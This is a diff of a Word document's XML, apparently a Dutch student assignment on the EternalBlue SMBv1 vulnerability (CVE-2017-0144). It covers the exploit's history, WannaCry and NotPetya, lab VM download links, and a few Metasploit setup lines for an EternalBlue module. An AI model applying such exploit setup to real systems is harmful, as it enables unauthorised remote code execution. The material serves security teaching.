--- a/Opdracht/OpdrachtNPE.docx
+++ b/Opdracht/OpdrachtNPE.docx
@@ -877,6 +877,17 @@
         </w:rPr>
         <w:t xml:space="preserve">Kali: </w:t>
       </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJAM40pQ9drba2UTnw?e=u8rEB6</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
@@ -901,10 +912,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
+      <w:hyperlink r:id="rId9" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
             <w:lang w:val="en-US"/>
           </w:rPr>
           <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDblwD</w:t>
@@ -1591,7 +1604,6 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>set ETERNALBLUEPATH /home/osboxes/EternalBlue/Eternalblue-Doublepulsar-Metasploit/deps/</w:t>
       </w:r>
     </w:p>
@@ -1614,6 +1626,7 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>set WINEPATH /home/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>

--- a/Opdracht/OpdrachtNPE.docx
+++ b/Opdracht/OpdrachtNPE.docx
@@ -625,8 +625,26 @@
                                         <w:sz w:val="36"/>
                                         <w:szCs w:val="36"/>
                                       </w:rPr>
-                                      <w:t>NPE</w:t>
+                                      <w:t xml:space="preserve">Docent: </w:t>
                                     </w:r>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                        <w:sz w:val="36"/>
+                                        <w:szCs w:val="36"/>
+                                      </w:rPr>
+                                      <w:t xml:space="preserve">Pieter-Jan </w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellStart"/>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                        <w:sz w:val="36"/>
+                                        <w:szCs w:val="36"/>
+                                      </w:rPr>
+                                      <w:t>Maenhaut</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellEnd"/>
                                   </w:p>
                                 </w:sdtContent>
                               </w:sdt>
@@ -726,8 +744,26 @@
                                   <w:sz w:val="36"/>
                                   <w:szCs w:val="36"/>
                                 </w:rPr>
-                                <w:t>NPE</w:t>
+                                <w:t xml:space="preserve">Docent: </w:t>
                               </w:r>
+                              <w:r>
+                                <w:rPr>
+                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                  <w:sz w:val="36"/>
+                                  <w:szCs w:val="36"/>
+                                </w:rPr>
+                                <w:t xml:space="preserve">Pieter-Jan </w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellStart"/>
+                              <w:r>
+                                <w:rPr>
+                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                  <w:sz w:val="36"/>
+                                  <w:szCs w:val="36"/>
+                                </w:rPr>
+                                <w:t>Maenhaut</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellEnd"/>
                             </w:p>
                           </w:sdtContent>
                         </w:sdt>
@@ -780,6 +816,491 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Voor de NPE opdracht van Cybersecurity &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Virtualisation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> werd gekozen voor </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>CVE 2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>0</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>17-0144</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>CVE-2017-0144</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ook wel gekend onder de naam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Microsoft SMBv1 Remote Code </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, is een </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>beveiligings</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kwetsbaarheid</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in het </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>besturingssysteem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> van Microsoft Windows. De kwetsbaarheid bevindt zich in het Server Message Block (SMB) protocol, dat wordt gebruikt voor het delen van bestanden en printers op een netwerk.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Deze </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> stelt kwaadaardige gebruikers in staat om van op afstand code uit te voeren op kwetsbare systemen zonder dat daarvoor enige vorm van authenticatie </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">voor </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>nodig is.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De NSA was al jaren op zoek naar potentiële kwetsbaarheden binnen Microsoft. Toen ze het SMBv1 protocol probleem ontdekten, ontwikkelde de NSA een </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, genaamd </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>EternalBlue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> om gebruik te maken van deze kwetsbaarheid.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In plaats van Microsoft </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in te lichten </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>over de risico’s die hun gebruikers liepen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, gebruikte de NSA </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>EternalBlue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> een half decennium lang om te helpen bij antiterrorisme- en contraspionage-operaties. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>EternalBlue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is slechts één voorbeeld van het gebruik van </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploits</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en achterdeurtjes in software door de NSA.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Toen de NSA Microsoft eindelijk op de hoogte bracht van het bestaan ervan, was het echter al uitgelekt door een berucht hackerscollectief dat bekend staat als </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Shadow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Brokers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>EternBlue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kwam aan het licht vanwege zijn rol in de verspreiding van de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ransomeware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>-aanval in 2017, die wereldwijd systemen trof en grote schade veroorzaakte</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:anchor=":~:text=The%20WannaCry%20ransomware%20attack%20occurred,networks%20all%20over%20the%20world" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>meer</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>info</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Datzelfde jaar volgende ook de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>NotPetya</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> aanval, gebruik makend van </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>EternalBlue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:val="nl-BE"/>
+          </w:rPr>
+          <w:t>meer info</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -792,6 +1313,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Deployment</w:t>
       </w:r>
     </w:p>
@@ -877,7 +1399,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Kali: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
+      <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -912,7 +1434,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId9" w:history="1">
+      <w:hyperlink r:id="rId12" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1626,7 +2148,6 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>set WINEPATH /home/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1639,23 +2160,13 @@
         <w:t>osboxes</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/.wine</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/.wine/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1731,6 +2242,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Shutdown Windows</w:t>
       </w:r>
     </w:p>
@@ -3366,6 +3878,18 @@
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="FollowedHyperlink">
+    <w:name w:val="FollowedHyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00F17591"/>
+    <w:rPr>
+      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Opdracht/OpdrachtNPE.docx
+++ b/Opdracht/OpdrachtNPE.docx
@@ -816,11 +816,30 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Voor de NPE opdracht van Cybersecurity &amp; </w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Voor de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>NPE-opdracht</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> van Cybersecurity &amp; </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -856,21 +875,21 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="nl-BE"/>
           </w:rPr>
-          <w:t>CVE 2</w:t>
+          <w:t>CVE 20</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="nl-BE"/>
           </w:rPr>
-          <w:t>0</w:t>
+          <w:t>1</w:t>
         </w:r>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="nl-BE"/>
           </w:rPr>
-          <w:t>17-0144</w:t>
+          <w:t>7-0144</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -932,19 +951,11 @@
         </w:rPr>
         <w:t xml:space="preserve">, is een </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>beveiligings</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> kwetsbaarheid</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>beveiligingskwetsbaarheid</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -982,7 +993,7 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> stelt kwaadaardige gebruikers in staat om van op afstand code uit te voeren op kwetsbare systemen zonder dat daarvoor enige vorm van authenticatie </w:t>
+        <w:t xml:space="preserve"> stelt kwaadaardige gebruikers in staat om van op afstand code uit te voeren op kwetsbare systemen zonder dat daar enige vorm van authenticatie </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1085,6 +1096,26 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
+        <w:t xml:space="preserve"> (en de bijhorende backdoor </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>DoublePulsar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
         <w:t xml:space="preserve"> een half decennium lang om te helpen bij antiterrorisme- en contraspionage-operaties. </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1119,7 +1150,13 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Toen de NSA Microsoft eindelijk op de hoogte bracht van het bestaan ervan, was het echter al uitgelekt door een berucht hackerscollectief dat bekend staat als </w:t>
+        <w:t xml:space="preserve"> Toen </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bleek dat het hackerscollectief The </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1133,21 +1170,67 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Brokers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>EternBlue</w:t>
+        <w:t xml:space="preserve"> Brokers de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bemachtigd hadden waarschuwde de NSA Microsoft om de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> te verhelpen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dit was echter te laat: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Etern</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>al</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Blue</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -1196,21 +1279,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="nl-BE"/>
           </w:rPr>
-          <w:t>meer</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="nl-BE"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="nl-BE"/>
-          </w:rPr>
-          <w:t>info</w:t>
+          <w:t>meer info</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -1229,7 +1298,19 @@
         <w:rPr>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Datzelfde jaar volgende ook de </w:t>
+        <w:t xml:space="preserve"> Datzelfde jaar volg</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e ook de </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1309,6 +1390,221 @@
           <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Requirements</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Virtualbox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Gedownloade bestanden:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
